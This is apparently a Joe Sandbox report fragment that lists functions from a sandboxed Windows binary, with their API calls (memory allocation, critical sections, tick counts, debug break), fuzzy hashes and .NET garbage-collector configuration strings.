Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Thread$CloseCreateHandlePriorityResume
String ID:
API String ID: 3633986771-0
Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
Instruction ID: 691832ce696eb9dbf0eff863e14803b1ed304c891524f16a44cb0befe56db358
Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
Instruction Fuzzy Hash: BFE092A6E2970283FB149B21F8197356750BF9AF95F4C4034CE5E57360EF3D91CA8640

Function 00007FF67FA50E30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67FA50E67
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF67FA50F2C

Strings

@, xrefs: 00007FF67FA50F24

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
Instruction ID: a2f00c433eacd884cdf808a0d702d03e3f7f58074c9a3d608199592bbfd9db05
Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
Instruction Fuzzy Hash: 6D410423B2DB4782E956CA369111B399792AF5ABC0F18C231ED4EA3744FF3CE4C58650

Function 00007FF67FA82320 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA82360
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA823D6
EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA8242B
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA82451

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
Instruction ID: 9b79ab3583bb7c44f7ff79e976a282a422ea20c517da91eedffab3337caa97c4
Opcode Fuzzy Hash: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
Instruction Fuzzy Hash: 61317E63E2C692C1EA12DF15E850BBA2390FF61B54F985136E94DC7691DEBCE481C3E0

Function 00007FF67FA516E0 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF67FA551C8,?,?,0000000A,00007FF67FA54220,?,?,00000000,00007FF67FA4DBB1), ref: 00007FF67FA51707
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF67FA551C8,?,?,0000000A,00007FF67FA54220,?,?,00000000,00007FF67FA4DBB1), ref: 00007FF67FA51727
VirtualAllocExNuma.KERNEL32 ref: 00007FF67FA51748

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
Instruction ID: f25d1ae47c9e31e4d354f8ae442d82ebcbb572339a39792594b977f162e8c8c6
Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
Instruction Fuzzy Hash: 4DF0C272B186D182EB208F06F400629AB60BB4AFD4F484138EF8C57B58DF3DD5C18B00

Function 00007FF67FA5759B Relevance: 3.1, APIs: 2, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF67FA575FE
GetTickCount64.KERNEL32 ref: 00007FF67FA57683

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
Instruction ID: 82438b9f281665842ab653f2ddbf6dde1de8963030069a79aa995aced563652b
Opcode Fuzzy Hash: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
Instruction Fuzzy Hash: F841BD33E3D686C5FA249B25A554E7A33A9AF01B84F044932D90DE37A1DE3CE681C6C0

Function 00007FF67FAAB610 Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67FAAAC51,?,?,?,?,00007FF67FA4FCD1,?,?,?,00007FF67FA50254,00000000,00000020,?), ref: 00007FF67FAAB62A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67FAAB640

Part of subcall function 00007FF67FAAB924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF67FAAB92D

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
Instruction ID: 96a39c1bc57967611e1283b2bf8cc3ee6ed42df7d29a7b71cc69475205c5962f
Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
Instruction Fuzzy Hash: B0E0EC02E39347C1F959216A55A68B403C00F583F0E1C2B30D93EC52C2AD2CA45E41D0

Function 00007FF67FA67A30 Relevance: 2.6, APIs: 2, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67FA82480: EnterCriticalSection.KERNEL32(?,?,?,00007FF67FA67A69), ref: 00007FF67FA824C4
Part of subcall function 00007FF67FA82480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF67FA67A69), ref: 00007FF67FA824EE

EnterCriticalSection.KERNEL32 ref: 00007FF67FA67B43
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA67B64

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
Instruction ID: a8400c090c3fda09cc2b4db3f2ffc24302c9c83a2fa883fed163bb937276c332
Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
Instruction Fuzzy Hash: 7C414D62A3864282EA148B29D950A7623A4AF16FF4F145335EA7DC76D5EE2CE441C3C0

Function 00007FF67FA508D0 Relevance: 2.6, APIs: 2, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF67FA50944

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
Instruction ID: a6cb43a4049937e12d2c1989226213b43fb82c2866b01a4e64330b8292c49a6f
Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
Instruction Fuzzy Hash: 3631DF33B25B52C2EA14CB1AA50057A67E4FB49BD0F048135DF4C97B95EF38E5A28380

Function 00007FF67FA82480 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00007FF67FA67A69), ref: 00007FF67FA824C4
LeaveCriticalSection.KERNEL32(?,?,?,00007FF67FA67A69), ref: 00007FF67FA824EE

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
Instruction ID: a85286fc8643a7771546ad868dbb6d4037072467ce778cdf666b27e4f68d664f
Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
Instruction Fuzzy Hash: 7C01B163D2C6D290F6219714F884ABA37D0AF52BA0F585131E85DC35A18E2CE8C1C3D0

Function 00007FF67FA516A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF67FA516B6
VirtualFree.KERNELBASE ref: 00007FF67FA516CC

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
Instruction ID: 9f87c06e27b8ad9ce12e7f1fe5a86851d727ea6daf986bd16fbdcb80fbdaf666
Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
Instruction Fuzzy Hash: BAE0C235F2610186EB189713A841A2523517F4BF00FC48038C40E87350DE2DA19BCB80

Function 00007FF67FAE2890 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF67FAE27CF,?,?,00000030), ref: 00007FF67FAE28E2

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 803ee097a5861c941b8cfd7976f9223188b032406d6128dfb8400f5b6217b5c5
Instruction ID: a517e1c14a7d8d2140319cd08f652e70fe9dec503c1a420b794a3388c7d693aa
Opcode Fuzzy Hash: 803ee097a5861c941b8cfd7976f9223188b032406d6128dfb8400f5b6217b5c5
Instruction Fuzzy Hash: 29218617F68202D4F711E6669D52EFD13E06F54758F644039EE0D86686EE2CE8428280

Function 00007FF67FA574AB Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67FA574F5

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
Instruction ID: d577e4ce92b98f7223e4df1249cc0e71badbfa184c13507af97991cf2eff0577
Opcode Fuzzy Hash: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
Instruction Fuzzy Hash: 47117563F3874582E6508A21A401EB553A5AB997B0F185331EE6DA37C6EF2CD582C7C0

Function 00007FF67FA44930 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67FA4B6A0: GetCurrentThreadId.KERNEL32 ref: 00007FF67FA4B6A4

Part of subcall function 00007FF67FA4CA20: VirtualQuery.KERNEL32 ref: 00007FF67FA4CA52

RaiseFailFastException.KERNEL32 ref: 00007FF67FA449B6

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
API String ID: 2131581837-0
Opcode ID: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
Instruction ID: 766575703f8f4630c072212c861b137b3e3ae49186a44f0a7bcd6535ce5a0a6b
Opcode Fuzzy Hash: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
Instruction Fuzzy Hash: 8C115E33918782C2DB249F29B4015AAB3A1FB457B0F144339E6BD877D6DF38D0468780

Function 00007FF67FA456A0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF67FA456F1

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
Instruction ID: 7f09707a8b2722dac515d53784980d94f9f0233b6e310795387ecc4f23af7328
Opcode Fuzzy Hash: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
Instruction Fuzzy Hash: 7DF08217F38642C2E640A725B982ABA13919F49BA0F545130ED1D87797CE3CE0818BC0

Function 00007FF67FA51770 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007FF67FA5177A

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
Instruction ID: 767ec36274ecc4a29d80606ba28c24db61222633d8f44e25942b2b327c9cdd65
Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
Instruction Fuzzy Hash: F4B01200F26041C2E3042723BC4270802193B07F02FC04064D708F2290CD1C81E50B00

Non-executed Functions

Function 00007FF67FA51A00 Relevance: 118.0, Strings: 94, Instructions: 546COMMON

Download Yara Rule

Strings

GCHighMemPercent, xrefs: 00007FF67FA51DCE
BreakOnOOM, xrefs: 00007FF67FA51ACF
System.GC.Name, xrefs: 00007FF67FA52304, 00007FF67FA5231C
GCHeapAffinitizeMask, xrefs: 00007FF67FA51D5F
GCConserveMem, xrefs: 00007FF67FA522D0
GCRegionRange, xrefs: 00007FF67FA51EBB
LogFileSize, xrefs: 00007FF67FA51D14
BGCFLEnableTBH, xrefs: 00007FF67FA5217D
MaxHeapCount, xrefs: 00007FF67FA51C89
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF67FA52267
BGCMemGoalSlack, xrefs: 00007FF67FA51FD9
GCHeapHardLimitLOHPercent, xrefs: 00007FF67FA52271
System.GC.HeapHardLimitPercent, xrefs: 00007FF67FA51E7B
GCCpuGroup, xrefs: 00007FF67FA51B8A
System.GC.HighMemoryPercent, xrefs: 00007FF67FA51DBF
GCProvModeStress, xrefs: 00007FF67FA51DE1
System.GC.CpuGroup, xrefs: 00007FF67FA51B78
System.GC.Concurrent, xrefs: 00007FF67FA51A43
LogEnabled, xrefs: 00007FF67FA51B15
BGCFLTuningEnabled, xrefs: 00007FF67FA51F9D
GCHeapHardLimitPOH, xrefs: 00007FF67FA5222A
LOHCompactionMode, xrefs: 00007FF67FA51BE0
System.GC.HeapHardLimit, xrefs: 00007FF67FA51E59
System.GC.HeapAffinitizeMask, xrefs: 00007FF67FA51D50
LatencyMode, xrefs: 00007FF67FA51CD8
SegmentSize, xrefs: 00007FF67FA51CBA
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF67FA52281
GCEnableSpecialRegions, xrefs: 00007FF67FA51EF7
BGCFLGradualD, xrefs: 00007FF67FA520C9
BGCFLEnableKd, xrefs: 00007FF67FA52141
System.GC.RetainVM, xrefs: 00007FF67FA51AAA
BGCFLEnableKi, xrefs: 00007FF67FA52123
GCConfigLogFile, xrefs: 00007FF67FA51F5E
